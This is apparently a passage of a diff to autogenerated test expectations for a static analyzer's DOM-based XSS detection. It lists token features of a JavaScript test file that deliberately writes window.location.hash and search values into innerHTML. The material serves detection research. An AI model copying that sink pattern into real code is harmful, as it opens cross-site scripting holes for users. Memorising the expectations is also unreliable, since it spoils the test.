    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:9 | elm | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:9 | elm | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm = d ... Id('x') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm = d ... Id('x') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm = d ... Id('x') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm = d ... Id('x') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:40 | elm = d ... Id('x') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:20 | document | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:20 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:20 | document | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:20 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:20 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:35 | documen ... entById | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:35 | documen ... entById | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:35 | documen ... entById | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:35 | documen ... entById | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:35 | documen ... entById | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | documen ... Id('x') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | documen ... Id('x') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | documen ... Id('x') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | documen ... Id('x') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | documen ... Id('x') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | exceptional return of documen ... Id('x') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | exceptional return of documen ... Id('x') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | exceptional return of documen ... Id('x') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | exceptional return of documen ... Id('x') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:13:13:13:40 | exceptional return of documen ... Id('x') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:13:22:13:35 | getElementById | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:13:22:13:35 | getElementById | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:13:22:13:35 | getElementById | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:13:22:13:35 | getElementById | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:13:22:13:35 | getElementById | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:13:37:13:39 | 'x' | CalleeFlexibleAccessPath | document.getElementById | | autogenerated/Xss/DomBasedXss/jquery.js:13:37:13:39 | 'x' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:13:37:13:39 | 'x' | contextFunctionInterfaces | test() | @@ -13881,12 +102440,52 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:13:37:13:39 | 'x' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:13:37:13:39 | 'x' | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:13:37:13:39 | 'x' | receiverName | document | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:5 | elm | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:5 | elm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:5 | elm | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:5 | elm | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:5 | elm | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:15 | elm.innerHTML | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:15 | elm.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:15 | elm.innerHTML | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:15 | elm.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:15 | elm.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:58 | elm.inn ... n.hash) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:58 | elm.inn ... n.hash) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:58 | elm.inn ... n.hash) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:58 | elm.inn ... n.hash) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:3:14:58 | elm.inn ... n.hash) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:7:14:15 | innerHTML | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:7:14:15 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:14:7:14:15 | innerHTML | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:7:14:15 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:7:14:15 | innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:36 | decodeURIComponent | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:36 | decodeURIComponent | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:36 | decodeURIComponent | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:36 | decodeURIComponent | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:36 | decodeURIComponent | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | decodeU ... n.hash) | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | decodeU ... n.hash) | contextFunctionInterfaces | test() | | autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | decodeU ... n.hash) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | decodeU ... n.hash) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | decodeU ... n.hash) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | decodeU ... n.hash) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | exceptional return of decodeU ... n.hash) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | exceptional return of decodeU ... n.hash) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | exceptional return of decodeU ... n.hash) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | exceptional return of decodeU ... n.hash) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:19:14:58 | exceptional return of decodeU ... n.hash) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:43 | window | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:43 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:43 | window | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:43 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:43 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:52 | window.location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:52 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:52 | window.location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:52 | window.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:52 | window.location | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:57 | window.location.hash | CalleeFlexibleAccessPath | decodeURIComponent | | autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:57 | window.location.hash | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:57 | window.location.hash | contextFunctionInterfaces | test() | @@ -13894,12 +102493,62 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:57 | window.location.hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:57 | window.location.hash | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:14:38:14:57 | window.location.hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:45:14:52 | location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:45:14:52 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:14:45:14:52 | location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:45:14:52 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:45:14:52 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:14:54:14:57 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:14:54:14:57 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:14:54:14:57 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:14:54:14:57 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:14:54:14:57 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:5 | elm | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:5 | elm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:5 | elm | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:5 | elm | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:5 | elm | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:15 | elm.innerHTML | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:15 | elm.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:15 | elm.innerHTML | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:15 | elm.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:15 | elm.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:60 | elm.inn ... search) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:60 | elm.inn ... search) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:60 | elm.inn ... search) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:60 | elm.inn ... search) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:3:15:60 | elm.inn ... search) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:7:15:15 | innerHTML | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:7:15:15 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:15:7:15:15 | innerHTML | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:7:15:15 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:7:15:15 | innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:36 | decodeURIComponent | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:36 | decodeURIComponent | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:36 | decodeURIComponent | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:36 | decodeURIComponent | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:36 | decodeURIComponent | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | decodeU ... search) | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | decodeU ... search) | contextFunctionInterfaces | test() | | autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | decodeU ... search) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | decodeU ... search) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | decodeU ... search) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | decodeU ... search) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | exceptional return of decodeU ... search) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | exceptional return of decodeU ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | exceptional return of decodeU ... search) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | exceptional return of decodeU ... search) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:19:15:60 | exceptional return of decodeU ... search) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:43 | window | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:43 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:43 | window | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:43 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:43 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:52 | window.location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:52 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:52 | window.location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:52 | window.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:52 | window.location | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:59 | window. ... .search | CalleeFlexibleAccessPath | decodeURIComponent | | autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:59 | window. ... .search | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:59 | window. ... .search | contextFunctionInterfaces | test() | @@ -13907,12 +102556,72 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:15:38:15:59 | window. ... .search | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
